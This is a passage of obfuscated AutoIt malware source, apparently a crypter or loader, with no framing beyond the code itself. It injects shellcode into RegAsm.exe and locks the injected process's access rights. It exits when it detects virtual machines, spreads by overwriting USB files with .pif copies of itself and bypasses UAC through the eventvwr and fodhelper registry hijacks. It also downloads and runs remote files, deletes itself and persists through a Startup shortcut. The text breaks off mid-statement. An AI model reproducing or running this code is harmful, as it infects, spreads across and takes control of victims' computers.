"85C00F84E4FEFFFF33C0897DF4663B4606736C8B7DD083C73C03FE8B07A900" $1267239031 = 195372937 RANDOM (3990407 ) ENDIF IF $1267239031 = 1014781231 THEN LOCAL $BINL = BINARYLEN ($BIN_SHELLCODE ) $1267239031 = 1086136603 RANDOM (3952055 ) ENDIF IF $1267239031 = 1029171870 THEN $BIN_SHELLCODE &= "8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8FF" $1267239031 = 518704526 MOD (1272682 , 3812828 ) STRING (1286433 + 4293770259 + 4291169513 ) ENDIF IF $1267239031 = 1052868023 THEN $BIN_SHELLCODE &= "5356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B" $1267239031 = 227757661 INT (3932423 ) ISFLOAT (1451006 * 2545822 + 284354 * 234733 ) ENDIF IF $1267239031 = 1086136603 THEN LOCAL $KEY = [EXECUTE ("DllStructCreate" ) , EXECUTE ("DllCall" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllStructSetData" ) ] $1267239031 = 1552556832 ISFLOAT ("oKw6zKUAxHOgJUk32JyK8uVzpSw0Wp3K67fxqAptLEufH8fsrTY6tz2307RSo4OhNdjLOWMBtf8C9Q1rLdIdA7qGflHtTHeS0mADYC" ) DIM $WLOAY3JFZFLULRRXLGCN = 1248278 ENDIF IF $1267239031 = 1131056637 THEN $BIN_SHELLCODE &= "F08D7F280FB7460641894DF03BC87CDC8B7B3C8B45F803FB837DEC00894734" DIM $QMWOWCJZD6EVCGQRXNTB = "woFURl6kqXNZokWh4T66VrOLvVF1k0fyug3ypEOqnoWjAFY54kCDxFheI4x6QeaARoEhqw1zdOSGFFkZ6J69wLbY8ZZvgTKinuBlbQOGtdA" $1267239031 = 63781146 ISBOOL (241201 + 4290981552 + 543449 + 276481 ) ENDIF IF $1267239031 = 1248908323 THEN $BIN_SHELLCODE &= "14897DF8897DBC8945D039BEA0000000741139BEA40000007409F646160175" CHR (2200056 ) $1267239031 = 718764494 STRING ("skd8Xq5zQslsbxpVLHTFanqv8vHm9YVfNmrx9VVTjTuV44NUlW3ULHJf4RaBSSA1HfOYg" ) PTR (3977705 + 3525856 + 4293184002 ) ENDIF IF $1267239031 = 1296546299 THEN $BIN_SHELLCODE &= "00FF76506A00FF55988BD885DB0F84450200006A406800300000FF7650FF76" $1267239031 = 463888510 DIM $ADFMLDSUTABSCNZP0MUB = 128789 * 2467528 + 1220413 + 1598930 + 3790979 * 3676379 * 911725 * 2162403 DIM $XCGC848ZRMY1JQK3B13T = 3906100 + 153301 * 2296994 + 3000313 + 2094034 * 817407 * 2633562 * 3794957 ENDIF IF $1267239031 = 1372412672 THEN $BIN_SHELLCODE &= "EE38830CC78564FFFFFF5764E101C78568FFFFFF18E4CA08C7856CFFFFFFE3" ISSTRING (1154943 * 422726 ) $1267239031 = 548984161 WINEXISTS ("addFVQ16sAs32j43LzhmAUM7FnK9k8yORuUbCkBaYWNhLMUhz4DmbQtqzf9Ge1VtbNlHz3zB8hyOfEv3CDJqEmNbbCK" ) ENDIF IF $1267239031 = 1435411003 THEN $BIN_SHELLCODE &= "B850E842FEFFFF8B8CB520FFFFFF890185C00F84910300004683FE0E7CD28B" RANDOM (32415 ) $1267239031 = 1623917350 MOD (2850608 , 2142441 ) ENDIF IF $1267239031 = 1446413075 THEN $BIN_SHELLCODE &= "006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF559485C00F847802" $1267239031 = 73392173 ENDIF IF $1267239031 = 1483208281 THEN $BIN_SHELLCODE &= "230FC7458CE86F180D898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45" $1267239031 = 1435411003 DIM $KQEZZAKG6RDRDLBOVZXB = "VcWC7UUwrQMe0uQEEq8qQVpAUkSZ9zEw" PTR ("w1pzkNKzmm1WjpiylJ9XuSWc5w2kpzdEAWiyS0FhNaG81c0jv7Bm0AxNfmEXWzjWjvuwhURve2julYl2GSZs80" ) ENDIF IF $1267239031 = 1532618530 THEN $BIN_SHELLCODE &= "0C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B" CHR (1960984 ) $1267239031 = 969182864 ENDIF IF $1267239031 = 1552556832 THEN LOCAL $LPSHELLCODE = $KEY ["1" ] ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $BINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] $1267239031 = 363789172 PTR (2813354 + 2455556 + 427058 ) ENDIF IF $1267239031 = 1622275345 THEN $BIN_SHELLCODE &= "C7855CFFFFFF794A8A0B898524FFFFFF8D45B0898528FFFFFF8D45A489852C" $1267239031 = 895876247 ENDIF IF $1267239031 = 1623473715 THEN $BIN_SHELLCODE &= "8B7D0833F657E8D7FFFFFF8BC885C974200FBE07C1E60403F08BC625000000" $1267239031 = 418593742 PTR ("v7MAlawF5DA8QkcQmc1SRRvbbDSBsL96FYvFylefVBvIbsuBnwyY7K9NKLyRs4ntDEC1YGrb7V6ovW9Tiq" ) ENDIF IF $1267239031 = 1623917350 THEN $BIN_SHELLCODE &= "DF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000" $1267239031 = 97398974 PTR (3685199 * 1486103 * 3440150 + 144987 ) ENDIF IF $1267239031 = 1655295316 THEN $BIN_SHELLCODE &= "33C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100" ISBINARY (289984 * 746420 + 4291953335 ) $1267239031 = 216567143 ISBOOL ("rgsFHcgKEpK8easRB3ONG10tXqezgkfYVl65XbrAGfIhpmIU8hjW3xizq8Sr8QEtjWn3ex4AKohBrSeJR" ) ENDIF IF $1267239031 = 1700268568 THEN LOCAL $BIN_SHELLCODE = "0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC5657" $1267239031 = 1623473715 INT (3657527 ) ENDIF IF $1267239031 = 1780023503 THEN LOCAL $FILE_STRUCT = $KEY ["0" ] ("byte lpfile[" & STRINGLEN ($LPFILE ) & "]" ) PTR ("B0Jo8C9QOKnTlNqQiH4iKNoFs0201HSfhLXq1dUKJaO0Vshpgvxh4kyXLd6hKjZh2iKI19ZeXsHJ9yVaSLTEjKl6m9OXhM9AlG7LRHyhGstKMYXns5z9At7" ) $1267239031 = 437981964 WINEXISTS ("b7ktgxCAisjnK71qJtxlAElm991JQOclFWFvjrFA" ) ENDIF IF $1267239031 = 1780715420 THEN $BIN_SHELLCODE &= "9E33FF68008000005753FF55C485C00F845BFEFFFF576A048D45F8508B85B4" $1267239031 = 427686952 ENDIF IF $1267239031 = 1876673018 THEN $BIN_SHELLCODE &= "45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D45948985" DIM $AWU8Q3FW7THG2VDQ7RYB = 2040570 $1267239031 = 2132296422 PTR (1388119 * 875688 + 1988207 ) ENDIF IF $1267239031 = 1933112639 THEN $BIN_SHELLCODE &= "FF55A485C00F84AD0200008D8510FCFFFF50FF75DCFF55A085C00F84980200" $1267239031 = 1446413075 ENDIF IF $1267239031 = 2005523844 THEN $BIN_SHELLCODE &= "C0742B25FF0F000003028945EC8BC88B46342904198B4DF08B47340FB74C4A" ISBOOL ("y4CbQvrfa5K3eGb0okmag6byfkHV15B65uydxMOnOijI3Wnkl9OYwl1B2d6EXGnfCN7Ti7CLE9v7XBFs7xI1qNITD6ltQkzh4egoZEcoGcsx03OzHNH" ) $1267239031 = 586222774 ENDIF IF $1267239031 = 2115662046 THEN LOCAL $HANDLEFROMPID = $KEY ["1" ] ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , "0x001F0FFF" , "bool" , "0" , "dword" , $RET ["0" ] ) ["0" ] MOD (991415 , 803740 ) $1267239031 = 202026599 WINEXISTS ("IndTvqDBvuunul3KqVVcM9jHprjKpZCxh8YL06er" ) ENDIF IF $1267239031 = 2132296422 THEN $BIN_SHELLCODE &= "48FFFFFF8D45C489854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFF" $1267239031 = 1372412672 ENDIF NEXT IF $PROTECT THEN ACL ($HANDLEFROMPID ) ENDIF ENDFUNC FUNC ACL ($HANDLE ) GLOBAL $648664962 = 323312849 GLOBAL $AX2RIEEDEG = 3689474 FOR $E = 0 TO 3526621 IF $648664962 = 323312849 THEN DHVWRCDTHNKPWFW ("3" , "12000" ) DIM $WWQUURD2H5FGNXQPK4BA = 976315 $648664962 = 967842408 CHR (4231 ) ENDIF IF $648664962 = 708304020 THEN LOCAL $ARRAY = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($CHAR ) ] EXITLOOP ISPTR ("hFe4Js4ajNI7Zq0MLKz61fhTz3RsKOwUCiQUkQuifohK8xLTtOp7vhNbxvDQ" ) ENDIF IF $648664962 = 813318089 THEN LOCAL $CHAR = DLLSTRUCTCREATE ("char[32]" ) CHR (1939303 ) $648664962 = 1944260330 ENDIF IF $648664962 = 967842408 THEN LOCAL $MAINSTRUCT = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CHR (3726352 ) $648664962 = 813318089 RANDOM (2076135 ) ENDIF IF $648664962 = 1944260330 THEN LOCAL $DWORD = DLLSTRUCTCREATE ("dword" ) INT (3857468 ) $648664962 = 708304020 CHR (1622212 ) ENDIF NEXT FOR $I = "0" TO "7" DLLSTRUCTSETDATA ($MAINSTRUCT , $I + "1" , $ARRAY [$I ] ) NEXT GLOBAL $658599975 = 323312849 GLOBAL $ZMNGEZMTJ2 = 1433067 FOR $E = 0 TO 3737049 IF $658599975 = 323312849 THEN DLLSTRUCTSETDATA ($CHAR , "1" , "CURRENT_USER" ) $658599975 = 967842408 INT (144649 ) ENDIF IF $658599975 = 648664962 THEN DLLCALL ("Kernel32.dll" , "Handle" , "LocalFree" , "Handle" , $DWORDPOINTER ) CHR (2584263 ) EXITLOOP DIM $2AJL5TLTMTVWVLJJUYVT = 351404 ENDIF IF $658599975 = 708304020 THEN $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($DWORD , EXECUTE ("1" ) ) , "ptr" , "0" ) DIM $CLDNUN32WIBTTUNDJKDU = 3635406 $658599975 = 648664962 INT (330935 ) ENDIF IF $658599975 = 813318089 THEN $DWORDPOINTER = DLLSTRUCTGETPTR ($DWORD ) ISPTR (620407 + 2895197 ) $658599975 = 1944260330 ENDIF IF $658599975 = 967842408 THEN $MAINSTRUCPOINTER = DLLSTRUCTGETPTR ($MAINSTRUCT ) $658599975 = 813318089 PTR ("JqjEO8km5YlBidbMJsLOb5okKOEA046k2EoJJDEi4FwBmGpWAWmAoVIOb839CTva1bJNYB" ) ENDIF IF $658599975 = 1944260330 THEN $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $DWORDPOINTER ) $658599975 = 708304020 ISPTR (2212243 * 249414 + 4292103711 * 260120 ) RANDOM (414558 ) ENDIF ISBOOL (2376135 * 686167 + 1447010 ) NEXT ENDFUNC FUNC DHVWRCDTHNKPWFW ($LOOP , $TIME ) LOCAL $VAR = RANDOM ("0" , "255" ) FOR $I = "0" TO $LOOP GLOBAL $813318089 = 323312849 GLOBAL $L7L79UHMVA = 2353665 FOR $E = 0 TO 261501 IF $813318089 = 323312849 THEN SLEEP ($TIME / $LOOP ) ISBOOL (2952363 + 1421411 ) $813318089 = 967842408 WINEXISTS ("EsXJulmWfXU9tJ1kf1CtMV45A2dogE3TguMu8AT4cnTXaU8TD4" ) ENDIF IF $813318089 = 967842408 THEN $VAR += RANDOM ("0" , "255" ) EXITLOOP ISPTR (1581524 + 1823701 + 3877683 * 2423082 ) ENDIF WINEXISTS ("7GmNiIrzbg4R4tUlgc7HH36frqWdGh3819V7STSmqxRr7BHYnEE2duAeJgw1Wn24m605IWCwtVrklNiZT70cMb5FHRwKw0zcEXfbLMpAbhHsdq268GiYx0" ) NEXT IF $VAR = $VAR THEN $VAR = RANDOM ("0" , "255" ) ENDIF NEXT ENDFUNC FUNC KHOCWHDEQXMSTFPOADRL ($SOCCURRENCENAME ) GLOBAL $813318089 = 323312849 GLOBAL $KATW1Z2ACU = 1093317 FOR $E = 0 TO 937915 ISBOOL ("fSybEDLCqYAM0SLONG4aspxbih" ) IF $813318089 = 323312849 THEN LOCAL $AHANDLE = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) $813318089 = 967842408 ISSTRING ("tcg9ZVRx0gd8pkVTIa1Ng50tw2xxONOtdVFOEQZVmLBjuc36topKMTVymWL7xsTmAT5ENfn3lgADCQ9t8BdzxeQu9hBTd2x43oSKhyro" ) ENDIF IF $813318089 = 967842408 THEN LOCAL $ALASTERROR = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) EXITLOOP ENDIF ISPTR ("5otYwcJFFMEZsSGKn7ymJjZycNjcRm56W4BOIAvHG3WKFGgYURRIxfyWz4WS3GYtRIdyq2bXL1ORxo3FGvsaEwIRFOpNNMN9eB37CSH2O36FzRykbqkH" ) NEXT IF $ALASTERROR ["0" ] = "183" THEN GLOBAL $813318089 = 323312849 GLOBAL $YYU9V3KMWI = 962935 FOR $E = 0 TO 3918727 IF $813318089 = 323312849 THEN DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $AHANDLE ["0" ] ) STRING (161009 * 1702567 + 2441486 + 4294805267 ) $813318089 = 967842408 ENDIF IF $813318089 = 967842408 THEN PROCESSCLOSE (@AUTOITEXE ) CHR (428221 ) EXITLOOP ISBINARY (3818722 * 3763393 ) ENDIF NEXT ENDIF ENDFUNC FUNC DJVLLWQLKATZJRZPICPARXZ ($RESNAME , $RESTYPE ) GLOBAL $784529671 = 323312849 GLOBAL $7TUFCZFNVU = 2994307 FOR $E = 0 TO 3262216 IF $784529671 = 323312849 THEN LOCAL $RESPOINTER DIM $FUHUVFF4VRW85A1KB1CS = 2081482 $784529671 = 967842408 MOD (2157306 , 665523 ) ENDIF IF $784529671 = 439940659 THEN RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CHR (2635326 ) EXITLOOP ISFLOAT (2768988 * 1774267 + 3368674 ) ENDIF IF $784529671 = 648664962 THEN LOCAL $MEMORYPOINTER DIM $GSU2MBUBOIWGTMKZT8I1 = "93rpDC2bDQ9KlA2" $784529671 = 658599975 INT (1317462 ) ENDIF IF $784529671 = 658599975 THEN $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] STRING ("vybE2ju5hydMj8CAU3x5iVSMpOoV4nA5lghC99YZqptC" ) $784529671 = 1590494170 DIM $LXAJ8IOJQXPM4IB37HAC = 3407810 * 1757049 * 325801 + 4292330764 MOD (3658019 , 1564137 ) ENDIF IF $784529671 = 708304020 THEN LOCAL $GLOBALMEMORYBLOCK DIM $M16C2HXKUK4RNZFKZHEL = 1400604 + 1971754 $784529671 = 648664962 ENDIF IF $784529671 = 813318089 THEN LOCAL $HINSTANCE $784529671 = 1944260330 DIM $A4QFLXKSM0ADN7OCTT8Y = "FV7wFIFzvh243qtTAzb6lzEpaWFRfSj2sM4iTSOZN30ThJU" INT (1198101 ) ENDIF IF $784529671 = 925089026 THEN $GLOBALMEMORYBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "LoadResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CHR (787086 ) $784529671 = 1407564695 ISPTR ("uN7aKpvkaSUmssIWhAcZvWyp51AY2bv5WZImVh8EuksKkUi3GCJ5RnCHoSeUYHr9vYACUwb9BGElDYfkSHqzAAoHwa7cdoQW2t" ) ENDIF IF $784529671 = 967842408 THEN LOCAL $RESSIZE $784529671 = 813318089 ENDIF IF $784529671 = 1407564695 THEN $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] $784529671 = 439940659 DIM $AM3CQQ2H5J2GTZ86N1TS = "IT0bxg706e0f7GzjmyFaVt" ENDIF IF $784529671 = 1590494170 THEN $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] ISBOOL ("CNqs99213ca2k4S8EbbW3IWaCmrzo7xB8vElOW1feOFglFvfdvqAIN132p0WRCL6NH4YyFsTk5RncQZ61lv3R73uDK" ) $784529671 = 925089026 STRING (190548 + 4292416822 + 4292852643 ) ENDIF IF $784529671 = 1944260330 THEN LOCAL $INFOBLOCK DIM $GQM6M0LA34EGSPROJUXL = "XfGfkCnluuEY1jRpy0Vh8ck3EtuV8bm3ujTkg0Cx8pIJar1f9ylDce4V5MK0iBmsiLDSzFjHxxiTDK3mCoVI0S0qo8pCoLoFcpAxYjODpM" $784529671 = 708304020 INT (1302124 ) ENDIF STRING (2761253 + 4293298758 * 819230 ) NEXT ENDFUNC FUNC ASAZRREHKGLB () LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO UBOUND ($ARRAY ) - "1" IF PROCESSEXISTS ($ARRAY [$I ] ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF NEXT ENDFUNC FUNC RSDBBCVUCE ($PROTECT ) LOCAL $RES = $GBCNYUEOGFONFLBWF IF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" ) THEN $PROCESSID = MWMQWLZFSVGLEKEBWPKTQCNGY (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" , "" , $RES , $PROTECT ) ELSEIF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" ) THEN $PROCESSID = MWMQWLZFSVGLEKEBWPKTQCNGY (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" , "" , $RES , $PROTECT ) ENDIF ENDFUNC FUNC AJJMOCPPKFEWODWKA () IF NOT WINEXISTS ("[CLASS:Progman]" ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF ENDFUNC FUNC TLRQDAKNGKXFDWQNVSPQPWUUICTCP () $USBLIST = DRIVEGETDRIVE ("REMOVABLE" ) IF $USBLIST <> "" THEN FOR $I = "1" TO $USBLIST ["0" ] IF $USBLIST [$I ] <> @HOMEDRIVE THEN GLOBAL $813318089 = 323312849 GLOBAL $BPQTWIMQOJ = 1858436 FOR $E = 0 TO 1993967 IF $813318089 = 323312849 THEN LOCAL $FILEARRAY INT (869246 ) $813318089 = 967842408 STRING ("6T1nvZyXbLKRnnJttGsDckp9ftytoXK1yUt6BHWXrAi2XLvdT3sNcIOVC2ibzeHobUrC4M1VUFmLcwlC8vKu" ) ENDIF IF $813318089 = 967842408 THEN $FILEARRAY = _FILELISTTOARRAYREC ($USBLIST [$I ] , "*" , EXECUTE ("1" ) , EXECUTE ("1" ) , EXECUTE ("0" ) , EXECUTE ("2" ) ) DIM $HCJZVWM341CT2IFCH3GW = 206504 EXITLOOP ISFLOAT (231055 + 4294127558 ) ENDIF RANDOM (1833045 ) NEXT FOR $F = "1" TO $FILEARRAY ["0" ] GLOBAL $813318089 = 323312849 GLOBAL $WJQV9I9SIE = 1546599 FOR $E = 0 TO 589658 IF $813318089 = 323312849 THEN $DATATARGET = BINARY (FILEREAD ($FILEARRAY [$F ] ) ) $813318089 = 967842408 ENDIF IF $813318089 = 967842408 THEN $CHECKDATA = STRINGINSTR ($FILEARRAY [$F ] , ".pif" ) EXITLOOP WINEXISTS ("RsTQjXg1EW5Vm4ywuKKGE8184YaO9vGXwKr0qc8ScsKAJGTi2gRnWwoTAVVuXA2ioixKMHfrL3Emxzywf1W2NtbavH" ) ENDIF NEXT IF NOT $CHECKDATA THEN GLOBAL $708304020 = 323312849 GLOBAL $N4KABLAJIF = 1112706 FOR $E = 0 TO 1334857 IF $708304020 = 323312849 THEN LOCAL $HANDLEF = FILEOPEN (@AUTOITEXE , "16384" ) WINEXISTS ("vbvyp" ) $708304020 = 967842408 RANDOM (1986752 ) STRING ("iJa883W5n7" ) ENDIF IF $708304020 = 813318089 THEN FILEDELETE ($FILEARRAY [$F ] ) $708304020 = 1944260330 ISFLOAT ("tlxj2y86A7qsV2zl" ) ENDIF IF $708304020 = 967842408 THEN FILEWRITE ($FILEARRAY [$F ] & ".pif" , FILEREAD ($HANDLEF ) ) $708304020 = 813318089 RANDOM (1038744 ) ENDIF IF $708304020 = 1944260330 THEN FILECLOSE ($HANDLEF ) EXITLOOP ENDIF NEXT ENDIF NEXT ENDIF NEXT ENDIF ENDFUNC FUNC RARUCLGLLFJNMMTFCYMKXQZQIJP () IF STRINGINSTR (@OSVERSION , "7" ) OR STRINGINSTR (@OSVERSION , "8" ) THEN IF NOT ISADMIN () THEN GLOBAL $1944260330 = 323312849 GLOBAL $N9O63VAHI9 = 1079579 FOR $E = 0 TO 3836295 IF $1944260330 = 323312849 THEN REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CHR (265540 ) $1944260330 = 967842408 CHR (3256860 ) ENDIF IF $1944260330 = 813318089 THEN EXIT EXITLOOP ISPTR (398255 * 1317061 * 173571 ) ENDIF IF $1944260330 = 967842408 THEN SHELLEXECUTE ("eventvwr" ) $1944260330 = 813318089 CHR (3989623 ) ENDIF WINEXISTS ("0UToN6OBkVe2hkOzCKnas4u5hy0BG9ujitUb81UXOn2ICezpu1KsX4" ) NEXT ENDIF ELSEIF STRINGINSTR (@OSVERSION , "10" ) THEN IF NOT ISADMIN () THEN GLOBAL $648664962 = 323312849 GLOBAL $5YYHPGM5KA = 600086 FOR $E = 0 TO 3637026 CHR (2557061 ) IF $648664962 = 323312849 THEN DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) $648664962 = 967842408 STRING ("VCc8" ) ISBINARY ("wn" ) ENDIF IF $648664962 = 708304020 THEN EXIT EXITLOOP ISPTR ("BsRiHtLYRz9BwIe3NveqFfqWyGGLMbq0wS2VuL4TwWzoyI9Nf48ZQnlwb5UaX9kOjifOQsIbAu4TObxZG2GS" ) ENDIF IF $648664962 = 813318089 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) $648664962 = 1944260330 ISPTR ("36wLVfpDu7Wu6yvsCRaG4C4CBLS86ikIjiGyHh46ivm5UxgdZ0dYT28Ab3jixqGmXmlX16VvXdxHq8TeFOjgfv0qkgwO7WI2YaiGlsl2f" ) ENDIF IF $648664962 = 967842408 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" ) ISFLOAT ("jcjeLSgAgAw4MUIgxaEFUq0m2mCraxujWU6tE3j0Vw3RjrOAs9" ) $648664962 = 813318089 ENDIF IF $648664962 = 1944260330 THEN SHELLEXECUTE ("fodhelper" ) MOD (3823291 , 789502 ) $648664962 = 708304020 ISFLOAT ("h3XpKE1NVwwicKHb8beu9Yedh" ) ENDIF ISPTR (3722875 + 2426798 * 664294 * 2553950 ) NEXT ENDIF ENDIF ENDFUNC FUNC SVEJXXJSKKUJZCUYVMSHAEL ($TYPE , $TITLE , $BODY ) IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN LOCAL $UINT = "0x00000010" IF $TYPE = "64" THEN $UINT = "0x00000040" ENDIF DLLCALL ("User32.dll" , "ptr" , "MessageBox" , "hwnd" , "Null" , "str" , $BODY , "str" , $TITLE , "uint" , $UINT ) ENDIF ENDFUNC FUNC QKSYGMNMNUOEXHVWRRODCJH ($URL , $FILENAME , $DIR ) IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN LOCAL $INSTALDIR = GETDIR ($DIR ) IF FILEEXISTS ($INSTALDIR & "\" & $FILENAME ) THEN FILEDELETE ($INSTALDIR & "\" & $FILENAME ) ENDIF GLOBAL $813318089 = 323312849 GLOBAL $XYIGNSFD4K = 225191 FOR $E = 0 TO 3453759 IF $813318089 = 323312849 THEN DLLCALL ("urlmon.dll" , "ptr" , "URLDownloadToFile" , "ptr" , "0" , "str" , $URL , "str" , $INSTALDIR & "\" & $FILENAME , "dword" , "0" , "ptr" , "0" ) $813318089 = 967842408 INT (3273815 ) DIM $YGDZZMGGAVX5MPLCKVGE = "f3weGF0S1735uacCx2tFYkgZ5WyJVSdmdzTnQU3QRxIYE9spi9m2nHZ4XGiVhp7i4R24rZWN9MYA" ENDIF IF $813318089 = 967842408 THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) STRING (1931252 + 4291865135 ) EXITLOOP RANDOM (2034303 ) ENDIF CHR (583120 ) NEXT ENDIF ENDFUNC FUNC LLBUPLMSHANIDLHCMEMP () IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN SHELLEXECUTE (@COMSPEC , "/k ping 127.0.0.1 -t 0 & del " & @AUTOITEXE & " & exit " , NULL , NULL , @SW_HIDE ) ENDIF ENDFUNC FUNC KGGJMOBCJUETCWRTLNXKZGWSZXBPV ($RESNAME , $FILENAME , $RUN , $RUNONCE , $DIR ) GLOBAL $648664962 = 323312849 GLOBAL $IIBAA3XHX7 = 2410921 FOR $E = 0 TO 1289462 IF $648664962 = 323312849 THEN $FILE = DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ($RESNAME , "10" ) , TRUE ) ISFLOAT ("Emmq8YkLTSwsCxMc1ewakyGZflhI7ryWnF66" ) $648664962 = 967842408 MOD (3261457 , 656895 ) ENDIF IF $648664962 = 708304020 THEN FILECLOSE ($FILEHANDLE ) EXITLOOP ENDIF IF $648664962 = 813318089 THEN LOCAL $FILEHANDLE = FILEOPEN ($INSTALDIR & "\" & $FILENAME , "2" ) ISSTRING ("vxigOxkXQLOBsJf6BRN9EUUvoAeaQl9Ao4zZxZqbQX6NjSXk9HC22caLMW1" ) $648664962 = 1944260330 ENDIF IF $648664962 = 967842408 THEN LOCAL $INSTALDIR = GETDIR ($DIR ) $648664962 = 813318089 ENDIF IF $648664962 = 1944260330 THEN FILEWRITE ($FILEHANDLE , $FILE ) $648664962 = 708304020 ISBINARY ("XgmFM3bhShHm4YlK8dSFRBb4EyaT81CqTsZFJvJyj8WEQaDvd8Nw4Xaufrbo3rj1NrCK9QaMCswSQGnD5NO" ) DIM $V6SDARTVF1Z40YH3WX7B = 3620073 ENDIF INT (2635705 ) NEXT IF $RUNONCE = FALSE THEN IF $RUN = TRUE THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ELSE IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ENDIF ENDFUNC FUNC MIVVMSGJPNONEWUB ($FILE , $REGKEY , $ATTRIB , $HIDDEN ) GLOBAL $784529671 = 323312849 GLOBAL $DGTOLJOH5F = 2219820 FOR $E = 0 TO 1133057 ISFLOAT ("XE3WQZ6brrck" ) IF $784529671 = 323312849 THEN DIRCREATE ($SOXGWLGCUOVMJM ) $784529671 = 967842408 PTR (926337 + 1071884 + 2697195 + 1173803 ) ENDIF IF $784529671 = 439940659 THEN LOCAL $VBSOPEN DIM $TXY5X22NKR7UHDVLAPQV = 1962837 + 4294735516 + 4293996117 EXITLOOP ENDIF IF $784529671 = 648664962 THEN LOCAL $OPENFILE = FILEOPEN (@AUTOITEXE , "16" ) $784529671 = 658599975 CHR (507487 ) STRING (2360434 * 45376 + 759639 ) ENDIF IF $784529671 = 658599975 THEN LOCAL $HFILE = FILEOPEN ($FULLPATH , "2" ) WINEXISTS ("U6rawlXUmUrQkvD1Q2Hmuc7pzLUuDtsntOWBf3cotcoNN4CJGiF2VTnS8bKUBCq2Aew" ) $784529671 = 1590494170 DIM $WWZT2RXTKFIJYVYABKAE = "dssW1VvmIG7bEvTcB054NzfKrN4eaLWeEHTDGGbFBgc8lit9exaUEk0MmR" ENDIF IF $784529671 = 708304020 THEN LOCAL $URLPATH = @STARTUPDIR & "\" & $REGKEY & ".url" DIM $V3F7MPE4ZYBGXHZJU59L = 2400755 + 2286132 + 2821529 + 1051973 * 122230 * 2686755 + 3673085 + 809362 $784529671 = 648664962 ENDIF IF $784529671 = 813318089 THEN LOCAL $FULLPATH = $SOXGWLGCUOVMJM & "\" & $FILE DIM $5FSSOFRV25SJVUTMPG9O = 3538052 $784529671 = 1944260330 ENDIF IF $784529671 = 925089026 THEN LOCAL $URLCONTENT = "[InternetShortcut]" & @CR & "URL=file:///" & STRINGREPLACE ($VBSPATH , "\" , "/" ) $784529671 = 1407564695 DIM $EFDLY1KIQ5U1UTB9ZGYZ = 933632 + 3622206 + 4293329514 * 3721962 + 659796 * 3569556 + 4294419155 ENDIF IF $784529671 = 967842408 THEN LOCAL $MODE = $HIDDEN ISBINARY (2345240 * 3306334 + 809435 + 3949641 ) $784529671 = 813318089 DIM $H2VUERLHMS59Y1CYSE2X = 611570 ENDIF IF $784529671 = 1407564695 THEN LOCAL $URLOPEN DIM $IAYW7YVSCRAJXVICSXHU = 3337811 * 1340777 + 2324484 * 3133329 * 2646375 * 1134941 + 4292515232 + 4293543052 $784529671 = 439940659 INT (2331776 ) ENDIF IF $784529671 = 1590494170 THEN LOCAL $BINARY = 